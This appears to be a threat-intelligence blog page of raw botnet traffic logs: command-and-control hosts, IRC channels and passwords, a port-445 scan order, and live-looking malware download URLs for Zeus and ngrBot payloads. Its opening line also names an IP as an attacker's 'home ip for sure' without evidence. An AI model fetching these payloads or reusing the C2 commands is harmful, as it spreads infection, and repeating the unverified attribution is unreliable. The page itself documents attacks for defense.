Category: Uncategorized

isreali hecker using zeus botnet and rat kjrub.no-ip.org 46.120.170.54 this is home ip for sure Outgoing connection to remote server: kjrub.no-ip.org TCP port 101 Outgoing connection to remote server: kjrub.no-ip.org TCP port 99 Outgoing connection to remote server: kjrub.no-ip.org TCP port 1604 kjrub.com kjrub.com 64.37.52.109 Opened listening TCP connection on port: 39698 Download URLs http://64.37.52.109/Zeus/config.binRead more...

itconsorcium.me itconsorcium.me 85.17.65.10 Opened listening TCP connection on port: 39231Download URLs http://85.17.65.10/system-updates/config.bin (itconsorcium.me) http://85.17.65.10/system-updates/config.bin (itconsorcium.me) http://kenney.cz.cc/system-updates/bot.exe Outgoing connection to remote server: itconsorcium.me TCP port 80 Outgoing connection to remote server: itconsorcium.me TCP port 80 hosting infos: http://whois.domaintools.com/85.17.65.10

Remote Host Port Number 205.134.246.98 9090 PASS prison 216.146.38.70 80 72.233.89.200 80 PRIVMSG {00-USA-XP-COMP-` =~@ :HTTP SET http://68.173.251.107/x.exe =~@ :SC// Sequential Port Scan started on 174.133.89.0:445 with a delay of 10 seconds for 0 minutes using 100 threads. PONG leaf.18632.com NICK {iNF-00-USA-XP-COMP-4138} USER MEAT * 0 :COMP JOIN ##hxxp## NICK {00-USA-XP-COMP-3086} JOIN ###meat hosting infos:Read more...

Remote Host Port Number 193.107.16.121 1234 PASS xxx 204.0.5.51 80 216.178.38.224 80 63.135.80.46 80 66.220.149.32 80 MODE NEW-[USA|00|P|24666] -ix JOIN #!nw! test PONG 22 MOTD NICK NEW-[USA|00|P|24666] USER XP-4055 * 0 :COMPUTERNAME hosting infos: http://whois.domaintools.com/193.107.16.121

ip 92.241.164.191 port 8718 Nick taAODJGm User nftmukqp Channel #c Now 15 talking in #c Topic 11 On : [ #c ] [ =zHG1ItuZYjPiK9Yvp+PRGtG2f+HhKg4GOeRK3Pm1UmC51Uf+mWyMyq8raFlVl4bRGkmubSKgAUMpPQHZYWV1ORetyaFvLR ] Topic 11 By 12: [ term ] hosting infos: http://whois.domaintools.com/92.241.164.191

Remote Host Port Number 213.251.170.52 80 46.105.224.170 6991 NICK New{US-XP-x86}5457206 USER 19245 “” “12420” :1586 MODE New{US-XP-x86}5457206 +iMm JOIN #FBI hosting infos: http://whois.domaintools.com/46.105.224.170

Remote Host Port Number 217.23.6.10 1997 NICK NEW{USA-XP-SP3}{733420} USER 7334 “” “TsGh” :7334 JOIN #Boss PONG :irc.Team-dnS.net hosting infos: http://whois.domaintools.com/217.23.6.10

sexykyle.no-ip.biz Resolved : [ sexykyle.no-ip.biz ] To [ 178.63.140.212 ] Remote Host Port Number 178.63.140.212 1997 PASS none NICK NEW{USA-XP-SP3}{946345} USER 9463 “” “TsGh” :9463 JOIN #testbot PONG :irc.L1GhTs.net NICK New{US-XP-x86}5635115 USER 5635115 “” “5635115” :5635115 MODE New{US-XP-x86}5635115 +iMm JOIN #aryan none PONG :irc.L1GhTs.net hosting infos: http://whois.domaintools.com/178.63.140.212

Remote Host Port Number 213.251.170.52 80 92.241.165.155 1863 PASS ngrBot NICK n{US|XPa}rwtnhzp USER rwtnhzp 0 0 :rwtnhzp JOIN #IrcPeru PeruRulz!! Update: NICK n{US|XPa}fnazajf USER fnazajf 0 0 :fnazajf JOIN #IrcPeru PeruRulz!! PRIVMSG #IrcPeru :[DNS]: Blocked 0 domain(s) – Redirected 34 domain(s) PRIVMSG #IrcPeru :[d=”http://wootryp.com/images/quote.swf.exe” s=”159744 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataQcxaxq.exe” – DownloadRead more...

Remote Host Port Number 212.34.147.101 80 213.251.170.52 80 91.211.117.161 1865 PASS ngrBot NICK n{US|XPa}rluznnc USER rluznnc 0 0 :rluznnc JOIN #main 4m3r1k4 JOIN #cn QUIT :removing hosting infos: http://whois.domaintools.com/91.211.117.161